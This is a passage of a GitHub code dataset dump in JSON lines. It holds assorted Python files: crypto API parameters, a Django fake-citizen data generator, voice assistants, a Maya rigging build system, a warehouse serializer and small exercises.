elif type == 'ada':\n ada_param = {\n \"slug\": \"cardano\",\n \"convert\": \"USD\"\n }\n return ada_param\n elif type == 'xrp':\n xrp_param = {\n \"slug\": \"ripple\",\n \"convert\": \"USD\"\n }\n return xrp_param\n elif type == 'ltc':\n ltc_param = {\n \"slug\": \"litecoin\",\n \"convert\": \"USD\"\n }\n return ltc_param\n elif type == 'xlm':\n xlm_param = {\n \"slug\": \"stellar\",\n \"convert\": \"USD\"\n }\n return xlm_param\n elif type == 'bnb':\n bnb_param = {\n \"slug\": \"binance-coin\",\n \"convert\": \"USD\"\n }\n return bnb_param\n elif type == 'doge':\n doge_param = {\n \"slug\": \"dogecoin\",\n \"convert\": \"USD\"\n }\n return doge_param\n elif type == 'usdt':\n usdt_param = {\n \"slug\": \"tether\",\n \"convert\": \"USD\"\n }\n return usdt_param\n\n\n","repo_name":"Jschofi95/PythonCrypto","sub_path":"CryptoData.py","file_name":"CryptoData.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33713838528","text":"import itertools\r\ndef fun_sum(data):\r\n num = 0\r\n for i in range(len(data)-1):\r\n num += abs(data[i]-data[i+1])\r\n return num\r\n\r\nn = int(input())\r\narr = list(map(int, input().split()))\r\np = list(itertools.permutations(arr, len(arr)))\r\nresult = 0\r\nfor i in p:\r\n temp = fun_sum(i)\r\n if temp>result:\r\n result = temp\r\n\r\nprint(result)","repo_name":"aeriheo/study","sub_path":"4월 1주차/BOJ_10819.py","file_name":"BOJ_10819.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32338874728","text":"from faker import Faker\nimport random as rd\nfrom datetime import datetime, timedelta\nfrom django.utils.crypto import get_random_string\nimport json\n\ndef random_date(start, end):\n \"\"\"\n This function will return a random datetime between two datetime\n objects.\n \"\"\"\n delta = end - start\n int_delta = (delta.days * 24 * 60 * 60) + delta.seconds\n random_second = rd.randrange(int_delta)\n return start + timedelta(seconds=random_second)\n\nfake = Faker('de_DE')\n\ntest_stations = [2, 3, 4, 5, 6]\nlabs = [7]\n\ncontact_person_current_id = 0\n\nRESULT_CHOICES = [\n (1, 'Positive'),\n (0, 'Negative'),\n# (-1, 'Pending'),\n]\n\nINTENSITY_CHOICES = [0, 1, 2]\n\ndef one_week_before():\n return datetime.now() - timedelta(days=7)\n\ndef three_weeks_hence():\n return datetime.now() + timedelta(days=21)\n\n\ndef generate_model(pk, model, data):\n return dict(pk=pk, model=model, 
fields=data)\n\n\ndef generate_access_token(pk):\n return generate_model(pk, \"citizens.AccessToken\", dict(token=get_random_string(64),\n citizen=pk,\n is_write=True,\n expired=str(three_weeks_hence())))\n\n\ndef generate_test(pk):\n return generate_model(pk, \"health.Test\", dict(citizen=pk,\n result=rd.choice(RESULT_CHOICES)[0],\n test_station=rd.choice(test_stations),\n laboratory=rd.choice(labs),\n created_at=str(datetime.now()),\n updated_at=str(datetime.now())))\n\n\n\"\"\"citizen = models.ForeignKey(Citizen, related_name=\"contact_persons\", on_delete=models.CASCADE)\n last_contact = models.DateTimeField(default=one_week_hence)\n\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n\n email = models.EmailField()\n telephone = PhoneNumberField()\n\n intensity = models.IntegerField(choices=INTENSITY_CHOICES, default=LOW)\n\n description = models.TextField()\"\"\"\n\n\ndef generate_contact_person(pk):\n global contact_person_current_id\n contact_person_current_id += 1\n return generate_model(contact_person_current_id, \"citizens.ContactPerson\",\n dict(first_name=fake.first_name(),\n last_name=fake.last_name(),\n citizen=pk,\n email=fake.email(),\n telephone=\"+49176\" + str(rd.randint(10000000, 99999999)),\n intensity=rd.choice(INTENSITY_CHOICES),\n description=fake.text()[0:200],\n last_contact=str(random_date(one_week_before(), datetime.now()))\n ))\n\n\ndef generate_citizen(pk):\n return generate_model(pk, \"citizens.Citizen\", dict(first_name=fake.first_name(),\n last_name=fake.last_name(),\n email=fake.email(),\n date_of_birth=str(fake.date_of_birth()),\n address=fake.street_name() + \" \" + str(rd.randint(1, 100)),\n zip_code=rd.choice([38100, 38101, 38102, 38103, 38104, 38105]),\n telephone=\"+49176\" + str(rd.randint(10000000, 99999999)),\n city=\"Braunschweig\"\n ))\n\n\noutput = []\nfor i in range(200):\n output.append(generate_citizen(i))\n output.append(generate_access_token(i))\n output.append(generate_test(i))\n\n for j in range(rd.randint(3,15)):\n output.append(generate_contact_person(i))\n\nwith open(\"base_data.json\", \"w\") as f:\n json.dump(output, f)\n","repo_name":"dippel-perk/morbus-clade","sub_path":"generate_fake_citizens.py","file_name":"generate_fake_citizens.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1939313743","text":"import speech_recognition as sr\nfrom datetime import datetime\nimport webbrowser\nimport time\nfrom gtts import gTTS\nfrom playsound import playsound\nimport random\nimport os\n\n\nr =sr.Recognizer()\n\ndef record(ask = False):\n with sr.Microphone()as source:\n if ask:\n speak(ask)\n audio = r.listen(source)\n voice =''\n try:\n voice = r.recognize_google(audio,language ='tr-TR')\n except sr.UnknownValueError:\n speak('anlayamadım')\n return voice\n\n \ndef cevap(voice):\n if 'pazartesi hangi dersler var' in voice:\n speak(\"matematik \")\n if 'video aç' in voice:\n searchb = record('ne aramak istiyorsunuz ?')\n urlb = 'https://www.youtube.com/results?search_query='+ searchb\n webbrowser.get().open(urlb)\n speak(searchb + 'için bulduklarım')\n \n if 'nasılsın'in voice:\n speak(\"iyi senden\")\n \n if 'saat kaç' in voice:\n speak(datetime.now().strftime('%H:%M:%S'))\n if 'arama yap' in voice:\n search = record('ne aramak istiyorsunuz ?')\n url = 'https://www.google.com/search?q='+ search\n webbrowser.get().open(url)\n speak(search + 'için bulduklarım')\n if 'uygulamadan çık' in voice:\n 
speak(\"görüşürüz\")\n exit()\n \ndef speak(string):\n tts = gTTS(string,lang ='tr')\n rand =random.randint(1,100000)\n file = 'audio-'+str(rand)+'.mp3'\n tts.save(file)\n playsound(file)\n os.remove(file)\n \n\n \n \n \n \n \nspeak(\"nasıl yardımcı olabilirim\")\ntime.sleep(1)\nwhile 1:\n voice =record()\n print(voice)\n cevap(voice)\n \n","repo_name":"NaciGokhanBasaran/Sesli-asistan","sub_path":"sesliasistan.py","file_name":"sesliasistan.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"tr","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74094809129","text":"import math\n\n\nclass Tile:\n def __init__(self, row, col):\n self.row = row\n self.col = col\n self.f = math.inf\n self.g = math.inf\n self.neighbors = []\n self.parent = None\n self.state = \"empty\"\n\n def __lt__(self, other):\n return self.f < getattr(other, \"f\", other)\n","repo_name":"xorz57/Pathfinder","sub_path":"pathfinder/entities/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70010417447","text":"# -*- coding: utf-8 -*-\n\n# build-in\nimport importlib\nimport itertools\n\n# maya\nfrom pymel import core as pm\n\n# mbox\nfrom mbox import logger\nfrom .utils import traversal, import_component_module, add_jnt\n\n# mgear\nfrom mgear.core import attribute, transform, icon, primitive, node, applyop\n\n\nclass Context(list):\n\n @property\n def assembly(self):\n return self._assembly\n\n @assembly.setter\n def assembly(self, assembly):\n self._assembly = assembly\n\n def __init__(self):\n super(Context, self).__init__()\n self._assembly = None\n\n def instance(self, oid):\n instance = list(filter(lambda ins: ins.component[\"oid\"] == oid, self))\n return instance[0] if instance else None\n\n\nclass Instance:\n\n @property\n def component(self):\n return self._component\n\n @property\n def context(self):\n return self._context\n\n @property\n def root(self):\n return self._root\n\n @property\n def ctls(self):\n return self._ctls\n\n @property\n def refs(self):\n return self._refs\n\n @property\n def jnts(self):\n # jnts[0] = [parent, ref, uniform scale,\n return self._jnts\n\n @property\n def ui_host(self):\n if self.component[\"ui_host\"]:\n _, index, oid = self.component[\"ui_host\"].split(\",\")\n ui_host = self.context.instance(oid).ctls[int(index)]\n else:\n ui_host = self.context.assembly.ctls[0]\n div_attr_name = f\"{self.component['comp_name']}_{self.component['comp_side']}{self.component['comp_index']}\"\n if not pm.attributeQuery(div_attr_name, node=ui_host, exists=True):\n attribute.addEnumAttribute(ui_host, div_attr_name, 0, [\" \"])\n attribute.setNotKeyableAttributes(ui_host, [div_attr_name])\n return ui_host\n\n @property\n def comp_parent_ref(self):\n parent_component = self.component.parent\n parent_instance = None\n while parent_component:\n parent_instance = self.context.instance(parent_component[\"oid\"])\n if parent_instance.refs:\n break\n parent_component = parent_component.parent\n if parent_instance:\n if self.component[\"ref_parent_index\"] > -1:\n if int(self.component[\"ref_parent_index\"]) < len(parent_instance.refs):\n return parent_instance.refs[int(self.component[\"ref_parent_index\"])]\n if int(self.component[\"guide_parent_index\"]) < len(parent_instance.comp_ref_parent_dict):\n return parent_instance.comp_ref_parent_dict[int(self.component[\"guide_parent_index\"])]\n return parent_instance.refs[-1]\n\n 
@property\n def comp_parent_jnt(self):\n parent_instance = None\n component = self.component\n while component.parent:\n parent_instance = self.context.instance(component.parent[\"oid\"])\n if parent_instance.jnts:\n break\n component = component.parent\n if parent_instance.jnts:\n if self.component[\"jnt_parent_index\"] > -1:\n if int(self.component[\"jnt_parent_index\"]) < len(parent_instance.jnts):\n return parent_instance.jnts[int(self.component[\"jnt_parent_index\"])]\n if self.component[\"ref_parent_index\"] > -1:\n if int(self.component[\"ref_parent_index\"]) < len(parent_instance.jnts):\n return parent_instance.jnts[int(self.component[\"ref_parent_index\"])]\n if int(self.component[\"guide_parent_index\"]) < len(parent_instance.comp_jnt_parent_dict):\n return parent_instance.comp_jnt_parent_dict[int(self.component[\"guide_parent_index\"])]\n return parent_instance.jnts[-1][2]\n return None\n\n def __init__(self, context, component=None):\n self._root = None\n self._ctls = list()\n self._refs = list()\n self._jnts = list()\n self._component = component\n self._context = context\n self._context.append(self)\n if self.component.is_assembly:\n self._context.assembly = self\n self.comp_ref_parent_dict = dict()\n self.comp_jnt_parent_dict = dict()\n\n def add_root(self, m=pm.datatypes.Matrix()):\n naming = self.component.assembly.naming\n parent = self.comp_parent_ref\n name = naming.name(self.component, False, extension=\"root\") if self.component.parent else self.component[\"name\"]\n root = primitive.addTransform(parent, name, m)\n attribute.addAttribute(root, \"is_rig\", \"bool\", keyable=False)\n attribute.setKeyableAttributes(root, [])\n pm.connectAttr(root.attr(\"message\"), self.component.network.attr(\"rig\"), force=True)\n self._root = root\n return root\n\n def add_loc(self, parent, description, m):\n naming = self.component.assembly.naming\n loc = primitive.addTransform(parent,\n naming.name(\n self.component,\n False,\n description=description,\n extension=\"loc\"),\n m=m)\n attribute.setKeyableAttributes(loc, [])\n return loc\n\n def add_ctl(self, parent, parent_ctl, color, ctl_attr, npo_attr, description, cns, m, **kwargs):\n naming = self.component.assembly.naming\n ctl_attr = ctl_attr if ctl_attr else [\"tx\", \"ty\", \"tz\", \"rx\", \"ry\", \"rz\", \"ro\", \"sx\", \"sy\", \"sz\"]\n npo_attr = npo_attr if npo_attr else [\"v\"]\n if cns:\n parent = primitive.addTransform(parent,\n f\"{kwargs['name']}_cns\" if \"name\" in kwargs else naming.name(\n self.component,\n False,\n description=description,\n extension=\"cns\"),\n m=m)\n npo = primitive.addTransform(parent,\n f\"{kwargs['name']}_npo\" if \"name\" in kwargs else naming.name(\n self.component,\n False,\n description=description,\n extension=\"npo\"),\n m=m)\n attribute.setKeyableAttributes(npo, npo_attr)\n ctl = icon.create(npo,\n f\"{kwargs['name']}_{self.component['ctl_name_ext']}\" if \"name\" in kwargs else naming.name(\n self.component,\n False,\n description=description),\n color=color,\n icon=kwargs[\"icon\"] if \"icon\" in kwargs else \"cube\",\n w=kwargs[\"w\"],\n h=kwargs[\"h\"],\n d=kwargs[\"d\"],\n m=m)\n attribute.addAttribute(ctl, \"is_ctl\", \"bool\", keyable=False)\n attribute.addAttribute(ctl, \"ui_host\", \"message\")\n attribute.setKeyableAttributes(ctl, ctl_attr)\n pm.connectAttr(ctl.attr(\"message\"), self.component.network.attr(\"ctls\")[len(self.ctls)], force=True)\n tag = node.add_controller_tag(ctl, parent_ctl)\n tag.attr(\"visibilityMode\").set(1)\n self._ctls.append(ctl)\n return ctl\n\n 
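# A ref is a plain attachment transform: comp_parent_ref above hands refs out\n    # as parents for child components, and add_ref records each new one on\n    # self._refs in creation order.\n    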
def add_ref(self, parent, description, m):\n naming = self.component.assembly.naming\n ref = primitive.addTransform(parent,\n naming.name(self.component, False, description=description, extension=\"ref\"),\n m)\n self._refs.append(ref)\n return ref\n\n def add_jnt(self, parent, ref, name, uni_scale):\n parent = parent if parent else self.comp_parent_jnt\n if not parent:\n parent = \"deform\"\n rot_off = self.component[\"jnt_rot_off\"] if \"jnt_rot_off\" in self.component else [0, 0, 0]\n self._jnts.append([parent, ref, name, uni_scale, rot_off])\n return name\n\n def get_ctl_color(self, ik_fk='ik'):\n color = None\n if not self.component.is_assembly:\n if self.component[\"override_color\"]:\n if self.component[\"use_RGB_color\"]:\n if ik_fk == \"ik\":\n color = self.component[\"RGB_ik\"]\n else:\n color = self.component[\"RGB_fk\"]\n else:\n if ik_fk == \"ik\":\n color = self.component[\"color_ik\"]\n else:\n color = self.component[\"RGB_fk\"]\n else:\n if self.component.assembly[\"use_RGB_color\"]:\n if self.component[\"comp_side\"] == \"L\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"l_RGB_ik\"]\n else:\n color = self.component.assembly[\"l_RGB_fk\"]\n elif self.component[\"comp_side\"] == \"R\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"r_RGB_ik\"]\n else:\n color = self.component.assembly[\"r_RGB_fk\"]\n elif self.component[\"comp_side\"] == \"C\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"c_RGB_ik\"]\n else:\n color = self.component.assembly[\"c_RGB_fk\"]\n else:\n if self.component[\"comp_side\"] == \"L\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"l_color_ik\"]\n else:\n color = self.component.assembly[\"l_color_fk\"]\n elif self.component[\"comp_side\"] == \"R\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"r_color_ik\"]\n else:\n color = self.component.assembly[\"r_color_fk\"]\n elif self.component[\"comp_side\"] == \"C\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"c_color_ik\"]\n else:\n color = self.component.assembly[\"c_color_fk\"]\n else:\n if self.component.assembly[\"use_RGB_color\"]:\n if self.component[\"comp_side\"] == \"L\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"l_RGB_ik\"]\n else:\n color = self.component.assembly[\"l_RGB_fk\"]\n elif self.component[\"comp_side\"] == \"R\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"r_RGB_ik\"]\n else:\n color = self.component.assembly[\"r_RGB_fk\"]\n elif self.component[\"comp_side\"] == \"C\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"c_RGB_ik\"]\n else:\n color = self.component.assembly[\"c_RGB_fk\"]\n else:\n if self.component[\"comp_side\"] == \"L\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"l_color_ik\"]\n else:\n color = self.component.assembly[\"l_color_fk\"]\n elif self.component[\"comp_side\"] == \"R\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"r_color_ik\"]\n else:\n color = self.component.assembly[\"r_color_fk\"]\n elif self.component[\"comp_side\"] == \"C\":\n if ik_fk == \"ik\":\n color = self.component.assembly[\"c_color_ik\"]\n else:\n color = self.component.assembly[\"c_color_fk\"]\n return color\n\n\nclass BuildSystem:\n\n @property\n def blueprint(self):\n return self._blueprint\n\n @property\n def context(self):\n return self._context\n\n @property\n def order(self):\n # TODO: buildsystem custom step\n self._context = Context()\n msgs = list()\n procedure = list()\n # if self.blueprint[\"precess\"] == 2:\n # return\n objects_msg = list()\n 
attributes_msg = list()\n operators_msg = list()\n connectors_msg = list()\n objects = list()\n attributes = list()\n operators = list()\n connectors = list()\n result = list()\n traversal(self.blueprint,\n lambda x: self.__load(x),\n lambda x: x[\"children\"],\n result)\n for comp, obj, attr, operator, connector in result:\n objects_msg.append(f\"objects {comp['comp_name']} {comp['comp_side']} {comp['comp_index']}\")\n attributes_msg.append(f\"attributes {comp['comp_name']} {comp['comp_side']} {comp['comp_index']}\")\n operators_msg.append(f\"operators {comp['comp_name']} {comp['comp_side']} {comp['comp_index']}\")\n connectors_msg.append(f\"connector {comp['comp_name']} {comp['comp_side']} {comp['comp_index']}\")\n objects.append(obj)\n attributes.append(attr)\n operators.append(operator)\n connectors.append(connector)\n msgs += objects_msg\n procedure += objects\n # if self.blueprint[\"precess\"] == 2:\n # return\n msgs += attributes_msg\n procedure += attributes\n # if self.blueprint[\"precess\"] == 2:\n # return\n msgs += operators_msg\n procedure += operators\n # if self.blueprint[\"precess\"] == 2:\n # return\n msgs += connectors_msg\n procedure += connectors\n # if self.blueprint[\"precess\"] == 2:\n # return\n\n msgs.append(\"network tree\")\n procedure.append(self.network_tree)\n msgs.append(\"ctl structure\")\n procedure.append(self.ctl_structure)\n msgs.append(\"jnt structure\")\n procedure.append(self.jnt_structure)\n msgs.append(\"script node\")\n procedure.append(self.script_node)\n return list(zip(msgs, procedure))\n\n def __init__(self, blueprint):\n self._blueprint = blueprint\n self._context = None\n\n def __load(self, component):\n mod = import_component_module(component[\"comp_type\"], False)\n comp = mod.Rig(self.context, component)\n return component, comp.objects, comp.attributes, comp.operators, comp.connector\n\n def build(self):\n logger.info(\"mbox build system\")\n order = self.order\n total = len(order)\n count = 0\n logger.info(f\"total process... \")\n # logger.info(f\"inspect jnt... \")\n # if self.blueprint.naming.inspect_jnt_names():\n # return\n for msg, process in order:\n logger.info(f\"{msg}... 
[{count} / {total}]\")\n process()\n count += 1\n\n logger.info(\"build success\")\n\n def network_tree(self):\n traversal(self.blueprint,\n lambda x: [pm.connectAttr(x.network.attr(\"affects\")[0],\n child.network.attr(\"affectedBy\")[0], force=True)\n for child in x[\"children\"]],\n lambda x: x[\"children\"],\n list())\n\n def ctl_structure(self):\n character_set = self.context.assembly.root.attr(\"character_sets\").inputs()[0]\n ctls_set = [x for x in character_set.members() if \"control\" in x.name()][0]\n for instance in self.context:\n for ctl in instance.ctls:\n for shp in ctl.getShapes():\n connect_info = pm.listConnections(shp, connections=True, plugs=True)\n for source, destination in connect_info:\n pass\n # print(source, destination)\n # pm.connectAttr(destination.replace(shape.name(), new_shape.name()), source)\n shp.attr(\"isHistoricallyInteresting\").set(0)\n pm.sets(ctls_set, addElement=instance.ctls)\n\n # add dag pose\n # default T, model, Sim\n\n def jnt_structure(self):\n connect_jnt = self.blueprint[\"connect_jnt\"]\n root = self.context.assembly.root\n character_set = root.attr(\"character_sets\").inputs()[0]\n jnts_set = [x for x in character_set.members() if \"deform\" in x.name()][0]\n for instance in self.context:\n comp = instance.component\n for index, jnt in enumerate(instance.jnts):\n parent, ref, name, uni_scale, rot_off = jnt\n j = add_jnt(parent, ref, name, uni_scale, rot_off=rot_off, connect_jnt=connect_jnt, dag_tree=root)\n side = \"C\" if comp[\"comp_side\"] == \"C\" else \"S\"\n label = f\"{comp['comp_name']}_{side}{comp['comp_index']}_{index}\"\n side_set = [\"C\", \"L\", \"R\"]\n j.attr(\"side\").set(side_set.index(comp[\"comp_side\"]))\n j.attr(\"type\").set(\"Other\")\n j.attr(\"otherType\").set(label)\n j.attr(\"radius\").set(0.5)\n pm.connectAttr(j.attr(\"message\"), comp.network.attr(\"jnts\")[index], force=True)\n pm.sets(jnts_set, addElement=j)\n\n def script_node(self):\n # TODO: buildsystem script node\n trash_node = list()\n self.blueprint.network.attr(\"script_node\").outputs()\n blueprint = context.blueprint\n if blueprint.network.attr(\"script_node\").outputs():\n root_script_node = blueprint.network.attr(\"script_node\").outputs()[0]\n block_script_node = root_script_node.attr(\"script_node\").outputs()\n pm.delete([root_script_node] + block_script_node)\n\n script_nodes = list()\n\n def _get_script_node(_block):\n nonlocal script_nodes\n _ins = context.instance(_block.ins_name)\n if _ins.get(\"script_node\"):\n script_nodes += _ins.get(\"script_node\")\n for __b in _block[\"blocks\"]:\n _get_script_node(__b)\n\n _get_script_node(blueprint)\n\n if not script_nodes:\n return\n root_script_node = pm.createNode(\"script\", name=\"mbox_sc\")\n root_script_node.attr(\"sourceType\").set(1)\n root_script_node.attr(\"scriptType\").set(1)\n attribute.addAttribute(root_script_node, \"script_node\", \"message\")\n for node in script_nodes:\n pm.connectAttr(root_script_node.attr(\"script_node\"), node.attr(\"script_node\"))\n pm.connectAttr(blueprint.network.attr(\"script_node\"), root_script_node.attr(\"script_node\"))\n before_script_code = f\"\"\"import pymel.core as pm\nimport maya.api.OpenMaya as om2\nimport traceback\nimport logging\n\nlogger = logging.getLogger()\n\ndef destroy_cb(*args): # all callback clear\n global mbox_destroy_new_id\n global mbox_destroy_open_id\n global mbox_destroy_remove_ref_id\n global mbox_destroy_unload_ref_id\n global mbox_character_cb_registry\n global mbox_character_namespace_registry\n 
logger.info(\"destroy_cb\")\n\n try:\n for array in mbox_character_cb_registry:\n om2.MNodeMessage.removeCallback(array[1])\n om2.MSceneMessage.removeCallback(mbox_destroy_new_id)\n om2.MSceneMessage.removeCallback(mbox_destroy_open_id)\n om2.MSceneMessage.removeCallback(mbox_destroy_remove_ref_id)\n om2.MSceneMessage.removeCallback(mbox_destroy_unload_ref_id)\n del mbox_character_cb_registry\n del mbox_character_namespace_registry\n del mbox_destroy_new_id\n del mbox_destroy_open_id\n del mbox_destroy_remove_ref_id\n del mbox_destroy_unload_ref_id\n except:\n logger.error(\"destroy_cb\")\n traceback.print_exc()\n\n\ndef refresh_registry(*argc): # refresh registry at reference unload, remove\n global mbox_character_cb_registry\n global mbox_character_namespace_registry\n\n remove_list = list()\n for ns in mbox_character_namespace_registry:\n if not pm.namespaceInfo(ns, listNamespace=True):\n remove_list.append(ns)\n for rm in remove_list:\n mbox_character_namespace_registry.remove(rm)\n\n for array in mbox_character_cb_registry:\n if array[0].fullPathName == \"\":\n om2.MNodeMessage.removeCallback(array[1])\n mbox_character_cb_registry = [x for x in mbox_character_cb_registry if x[0].fullPathName() != \"\"]\n\n\ndef run_script_node():\n global mbox_destroy_id\n global mbox_character_cb_registry\n global mbox_character_namespace_registry\n\n try:\n mbox_character_namespace_registry\n except:\n mbox_character_namespace_registry = list()\n\n oid = '{blueprint[\"oid\"]}'\n all_network = [network for network in pm.ls(type=\"network\") if network.hasAttr(\"oid\")]\n networks = [network for network in all_network if network.attr(\"oid\").get() == oid]\n namespaces = pm.namespaceInfo(listOnlyNamespaces=True, recurse=True)\n if \"\" in mbox_character_namespace_registry:\n mbox_character_namespace_registry.remove(\"\")\n if not networks:\n return\n for network in networks:\n this_node = network.attr(\"script_node\").outputs(type=\"script\")\n namespace = network.namespace()\n if namespace:\n namespace = namespace[:-1]\n if this_node and namespace not in mbox_character_namespace_registry:\n block_scripts = this_node[0].attr(\"script_node\").outputs(type=\"script\")\n for sn in block_scripts:\n pm.scriptNode(sn, executeBefore=True)\n mbox_character_namespace_registry.append(namespace)\n\nrun_script_node()\n\ntry:\n om2.MSceneMessage.removeCallback(mbox_destroy_new_id)\nexcept:\n pass\nfinally:\n mbox_destroy_new_id = om2.MSceneMessage.addCallback(om2.MSceneMessage.kAfterNew, destroy_cb)\ntry:\n om2.MSceneMessage.removeCallback(mbox_destroy_open_id)\nexcept:\n pass\nfinally:\n mbox_destroy_open_id = om2.MSceneMessage.addCallback(om2.MSceneMessage.kAfterOpen, destroy_cb)\ntry:\n om2.MSceneMessage.removeCallback(mbox_destroy_remove_ref_id)\nexcept:\n pass\nfinally:\n mbox_destroy_remove_ref_id = om2.MSceneMessage.addCallback(om2.MSceneMessage.kAfterRemoveReference, refresh_registry)\ntry:\n om2.MSceneMessage.removeCallback(mbox_destroy_unload_ref_id)\nexcept:\n pass\nfinally:\n mbox_destroy_unload_ref_id = om2.MSceneMessage.addCallback(om2.MSceneMessage.kAfterUnloadReference, refresh_registry)\"\"\"\n pm.scriptNode(root_script_node, edit=True, beforeScript=before_script_code)\n pm.scriptNode(root_script_node, executeBefore=True)\n","repo_name":"chowooseung/mbox","sub_path":"scripts/mbox/box/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":22978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72240282728","text":"from 
django.db import transaction\nfrom rest_framework import serializers\nfrom rest_framework.generics import get_object_or_404\n\nfrom shop.models import Product\nfrom shop.serializers import ProductSerializer\nfrom warehouse.models.warehouse import (\n WarehouseItem, WarehouseItemComponent, WarehouseComponent\n)\nfrom warehouse.serializers.storage import StorageUnitComponentSerializer\n\n\nclass WarehouseComponentSerializer(serializers.ModelSerializer):\n storage_units = StorageUnitComponentSerializer(many=True, read_only=True)\n\n class Meta:\n model = WarehouseComponent\n fields = ['id', 'storage_units', 'name']\n\n\nclass WarehouseItemComponentSerializer(serializers.ModelSerializer):\n component = WarehouseComponentSerializer(read_only=True)\n component_id = serializers.IntegerField(write_only=True,\n source='component.id')\n\n class Meta:\n model = WarehouseItemComponent\n fields = ['id', 'component', 'quantity', 'component_id']\n\n\nclass WarehouseItemSerializer(serializers.ModelSerializer):\n warehouse_components = WarehouseItemComponentSerializer(\n many=True, read_only=True\n )\n product = ProductSerializer(read_only=True)\n warehouse_components_list = WarehouseItemComponentSerializer(\n many=True, write_only=True\n )\n product_id = serializers.IntegerField(write_only=True)\n\n class Meta:\n model = WarehouseItem\n fields = [\n 'id', 'product', 'warehouse_components',\n 'warehouse_components_list', 'product_id',\n ]\n\n def to_internal_value(self, data):\n if 'warehouse_components_list' in data:\n component_ids = [\n component['component_id']\n for component in data['warehouse_components_list']\n ]\n data['warehouse_components'] = WarehouseItemComponentSerializer(\n WarehouseComponent.objects.filter(id__in=component_ids),\n many=True\n )\n if 'product_id' in data:\n data['product'] = ProductSerializer(\n get_object_or_404(Product.objects.all(), pk=data['product_id'])\n )\n\n return super().to_internal_value(data)\n\n @staticmethod\n def update_or_create_components(components, instance):\n if components:\n current_components = []\n for warehouse_component in components:\n component_id = warehouse_component['component']['id']\n WarehouseItemComponent.objects.update_or_create(\n item=instance,\n component_id=component_id,\n defaults={\n 'quantity': warehouse_component['quantity'],\n }\n )\n current_components.append(component_id)\n\n instance.warehouse_components.exclude(\n component_id__in=current_components\n ).delete()\n\n @transaction.atomic\n def create(self, validated_data):\n warehouse_components = validated_data.pop(\n 'warehouse_components_list'\n )\n product = validated_data.pop('product_id')\n if product is not None:\n validated_data['product'] = Product.objects.get(id=product)\n\n instance = super().create(validated_data)\n\n self.update_or_create_components(warehouse_components, instance)\n\n return instance\n\n @transaction.atomic\n def update(self, instance, validated_data):\n warehouse_components = validated_data.pop(\n 'warehouse_components_list', None\n )\n product = validated_data.pop('product_id', None)\n if product is not None:\n validated_data['product'] = Product.objects.get(id=product)\n\n instance = super().update(instance, validated_data)\n\n self.update_or_create_components(warehouse_components, instance)\n\n return 
instance\n","repo_name":"godesteem/rental","sub_path":"warehouse/serializers/warehouse.py","file_name":"warehouse.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31515898747","text":"from collections import deque\r\n\r\nfirework_effects = deque([int(x) for x in input().split(', ')])\r\nexplosives = [int(x) for x in input().split(', ')]\r\nperfect_show = False\r\n\r\nfireworks = {\r\n 'Palm': 0,\r\n 'Willow': 0,\r\n 'Crossette': 0\r\n}\r\n\r\nwhile firework_effects and explosives:\r\n firework = firework_effects.popleft()\r\n explosive = explosives.pop()\r\n\r\n if explosive <= 0:\r\n firework_effects.appendleft(firework)\r\n continue\r\n\r\n if firework <= 0:\r\n explosives.append(explosive)\r\n continue\r\n\r\n\r\n total_power = firework + explosive\r\n\r\n if total_power % 3 == 0 and total_power % 5 != 0:\r\n fireworks['Palm'] += 1\r\n elif total_power % 5 == 0 and total_power % 3 != 0:\r\n fireworks['Willow'] += 1\r\n elif total_power % 3 == 0 and total_power % 5 == 0:\r\n fireworks['Crossette'] += 1\r\n else:\r\n firework_effects.append(firework - 1)\r\n explosives.append(explosive)\r\n\r\n if fireworks['Palm'] >= 3 and fireworks['Willow'] >= 3 and fireworks['Crossette'] >= 3:\r\n perfect_show = True\r\n break\r\n\r\nif perfect_show:\r\n print(\"Congrats! You made the perfect firework show!\")\r\nelse:\r\n print(\"Sorry. You can't make the perfect firework show.\")\r\nif firework_effects:\r\n print(f'Firework Effects left: {\", \".join([str(x) for x in firework_effects])}')\r\nif explosives:\r\n print(f'Explosive Power left: {\", \".join([str(x) for x in explosives])}')\r\n\r\nfor key in fireworks:\r\n print(f'{key} Fireworks: {fireworks[key]}')","repo_name":"MihailPo91/SoftUni","sub_path":"Advanced/exam_prep/fireworks_show.py","file_name":"fireworks_show.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5536384427","text":"import pyttsx3 #pip install pyttsx3\r\nimport speech_recognition as sr #pip install speechRecognition\r\nimport datetime\r\nimport wikipedia #pip install wikipedia\r\nimport webbrowser\r\nimport os\r\nimport smtplib\r\n\r\nengine = pyttsx3.init('sapi5')\r\nvoices = engine.getProperty('voices')\r\n# print(voices[1].id)\r\nengine.setProperty('voice', voices[1].id)\r\n\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\n\r\ndef wishMe():\r\n hour 